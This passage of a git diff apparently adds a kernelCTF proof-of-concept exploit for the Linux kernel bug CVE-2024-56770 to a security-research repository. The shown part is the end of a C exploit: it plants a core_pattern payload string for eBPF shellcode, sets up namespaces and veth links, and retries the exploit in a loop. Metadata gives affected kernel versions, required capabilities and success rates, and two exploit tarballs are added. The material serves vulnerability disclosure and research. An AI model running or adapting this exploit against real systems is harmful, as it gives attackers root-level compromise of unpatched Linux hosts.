MAP_PRIVATE | MAP_FIXED | MAP_ANON, -1, 0); + strcpy(core, "|/proc/%P/fd/666 %P"); // put payload string into known address which will used by ebpf shellcode + + setup_cpu_entry_area(); + +retry: + new_ns(); + + ip_link_lo_up(); + ip_link_set_lo_mtu_1500(); + + // ip link add outer0 numrxqueues 16 numtxqueues 1025 type veth peer + 
add_veth_link("outer0", "inner0", 16, 1025); + + exploit(); + + goto retry; +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/metadata.json b/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/metadata.json new file mode 100644 index 000000000..46eda0781 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/metadata.json @@ -0,0 +1,41 @@ +{ + "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids": [ + "exp203", + "exp208" + ], + "vulnerability": { + "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=647cef20e649c576dff271e018d5d15d998b629d", + "cve": "CVE-2024-56770", + "affected_versions": [ + "3.3 - 6.13-rc2" + ], + "requirements": { + "attack_surface": [ + "userns" + ], + "capabilities": [ + "CAP_NET_ADMIN, CAP_NET_RAW" + ], + "kernel_config": [ + "CONFIG_NET_SCHED, CONFIG_NET_SCH_NETEM" + ] + } + }, + "exploits": { + "cos-109-17800.372.38": { + "uses": [ + "userns" + ], + "requires_separate_kaslr_leak": false, + "stability_notes": "9 times success per 10 times run" + }, + "mitigation-v3b-6.1.55": { + "uses": [ + "userns" + ], + "requires_separate_kaslr_leak": false, + "stability_notes": "7 times success per 10 times run" + } + } +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/original_exp203.tar.gz b/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/original_exp203.tar.gz new file mode 100644 index 000000000..39bba08a6 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/original_exp203.tar.gz differ diff --git a/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/original_exp208.tar.gz b/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/original_exp208.tar.gz new file mode 100644 index 000000000..2f232eac2 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/original_exp208.tar.gz differ